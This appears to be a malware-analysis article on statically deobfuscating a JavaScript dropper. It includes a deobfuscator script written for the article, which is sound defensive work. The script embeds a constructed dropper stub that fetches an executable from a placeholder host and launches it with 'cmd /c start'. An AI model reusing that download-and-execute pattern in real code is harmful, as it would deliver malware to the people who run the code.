This article explains one way malware authors spread malicious software in the wild. The easy way, of course, is to convince the victim to run the malicious code themselves: no 0-day is required, and no known vulnerability either.
As you know, the comments are useless here. Just remove them!
Now take a look at the variable named “XyuHqSR”. It is a multidimensional array, referenced six times in the malicious code. We can parse it to extract the strings the JS file uses. Just run this code.
This yields the following strings, each prefixed with its array index.
Now, with a bit of “search & replace” and some string concatenation (follow the “+” characters…), the result is a clean file you don’t need to execute in a sandbox to learn its behaviour.
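The three steps above (strip the comments, parse the string array, inline the references and fold the “+” concatenations) can be scripted so you don’t repeat them by hand for the next sample. The code below is an added example written for this article, not the script the author ran and not the dropper the article analyses: the only thing taken from the post is the array name “XyuHqSR”. The obfuscated input is a constructed stub, the object names and URL in it are made up, and the helper names (`stripComments`, `extractArray`, `inlineReferences`, `foldConcatenations`, `deobfuscate`) are this example’s own. It also generalises a little beyond the post by resolving nested indices such as `XyuHqSR[1][2]`, since the array is described as multidimensional.

```javascript
// Constructed sample: a dropper stub in the "string table + index" style, NOT the file from the post.
const SAMPLE = [
  '// constructed dropper stub, not the file analysed in the post',
  'var XyuHqSR = [["WScript.Shell", "%TEMP%\\\\p.exe"],',
  '               ["MSXML2.XMLHTTP", "GET", "http://", "example.invalid/p.exe"]];',
  'var sh = WScript.CreateObject(XyuHqSR[0][0]); /* shell object */',
  'var x = WScript.CreateObject(XyuHqSR[1][0]);',
  'x.open(XyuHqSR[1][1], XyuHqSR[1][2] + XyuHqSR[1][3], false); // fetch stage 2',
  "sh.Run('cmd' + \" /c \" + 'start ' + XyuHqSR[0][1]);",
].join('\n');

// Decode one JS string literal starting at src[pos] (a quote). Handles \n \r \t \0 \\ \" \' \xHH \uHHHH.
function parseString(src, pos) {
  const q = src[pos];
  const simple = { n: '\n', r: '\r', t: '\t', '0': '\0', '\\': '\\', '"': '"', "'": "'" };
  let i = pos + 1, val = '';
  while (i < src.length && src[i] !== q) {
    if (src[i] === '\\') {
      const n = src[i + 1];
      if (n === 'x') { val += String.fromCharCode(parseInt(src.substr(i + 2, 2), 16)); i += 4; continue; }
      if (n === 'u') { val += String.fromCharCode(parseInt(src.substr(i + 2, 4), 16)); i += 6; continue; }
      val += simple[n] !== undefined ? simple[n] : n;
      i += 2; continue;
    }
    val += src[i++];
  }
  return { value: val, end: i + 1 };            // end = index just past the closing quote
}

// Parse an array literal of string literals and nested arrays starting at src[pos] === '['.
function parseArray(src, pos) {
  if (src[pos] !== '[') throw new Error('expected [ at ' + pos);
  const out = [];
  let i = pos + 1;
  for (;;) {
    while (/\s|,/.test(src[i])) i++;
    const c = src[i];
    if (c === ']') return { value: out, end: i + 1 };
    const r = c === '[' ? parseArray(src, i)
      : (c === '"' || c === "'") ? parseString(src, i)
      : null;
    if (!r) throw new Error('unexpected token at ' + i + ' (only strings and nested arrays supported)');
    out.push(r.value); i = r.end;
  }
}

// Remove // and /* */ comments while skipping over string literals (a "//" inside a URL must survive).
// Caveat: regex literals are not tokenised, so a pattern containing "//" would be mis-read as a comment.
function stripComments(src) {
  let out = '', i = 0;
  while (i < src.length) {
    const c = src[i], n = src[i + 1];
    if (c === '"' || c === "'") { const r = parseString(src, i); out += src.slice(i, r.end); i = r.end; continue; }
    if (c === '/' && n === '/') { while (i < src.length && src[i] !== '\n') i++; continue; }
    if (c === '/' && n === '*') { const e = src.indexOf('*/', i + 2); i = e < 0 ? src.length : e + 2; continue; }
    out += c; i++;
  }
  return out;
}

const escapeRe = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');

// Locate "var NAME = [...]" and parse it; also report the span of the declaration so it can be cut out.
function extractArray(src, name) {
  const m = new RegExp('(?:\\b(?:var|let|const)\\s+)?\\b' + escapeRe(name) + '\\s*=\\s*\\[').exec(src);
  if (!m) throw new Error('array ' + name + ' not found');
  const r = parseArray(src, m.index + m[0].length - 1);
  const tail = /^\s*;/.exec(src.slice(r.end));       // swallow the trailing semicolon
  return { value: r.value, declStart: m.index, declEnd: r.end + (tail ? tail[0].length : 0) };
}

// List every string with its index path, e.g. { path: '[1][2]', value: 'http://' } (the "prefixed by index" view).
function flattenTable(table, prefix = '') {
  return table.flatMap((v, k) => Array.isArray(v) ? flattenTable(v, prefix + '[' + k + ']')
                                                    : [{ path: prefix + '[' + k + ']', value: v }]);
}

// Replace NAME[i][j]... with the resolved string literal; unresolved references are left for manual review.
function inlineReferences(src, name, table) {
  const re = new RegExp('\\b' + escapeRe(name) + '((?:\\s*\\[\\s*\\d+\\s*\\])+)', 'g');
  return src.replace(re, (whole, idx) => {
    let v = table;
    for (const k of idx.match(/\d+/g).map(Number)) v = Array.isArray(v) ? v[k] : undefined;
    return typeof v === 'string' ? JSON.stringify(v) : whole;
  });
}

// Fold "a" + 'b' into "ab" until nothing changes (handles chains of any length).
const CONCAT = /("(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')\s*\+\s*("(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')/g;
function foldConcatenations(src) {
  let prev;
  do {
    prev = src;
    src = src.replace(CONCAT, (_, a, b) => JSON.stringify(parseString(a, 0).value + parseString(b, 0).value));
  } while (src !== prev);
  return src;
}

function deobfuscate(src, name) {
  let s = stripComments(src);
  const { value, declStart, declEnd } = extractArray(s, name);
  s = s.slice(0, declStart) + s.slice(declEnd);       // the table itself is no longer needed
  s = foldConcatenations(inlineReferences(s, name, value));
  return s.replace(/[ \t]+$/gm, '').replace(/^[ \t]*\n/gm, '');
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const e of flattenTable(extractArray(stripComments(SAMPLE), 'XyuHqSR').value)) console.log(e.path, e.value);
  console.log(deobfuscate(SAMPLE, 'XyuHqSR'));
}
```

On the constructed sample the output is the four-line plaintext stub with the URL and the `cmd /c start …` command in the clear. Because `inlineReferences` leaves any reference it cannot resolve untouched (for example an index computed at runtime), anything that survives in the output is exactly what still needs a human eye, which is the point of doing this statically instead of in a sandbox.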
Easy to read now, isn’t it? 🙂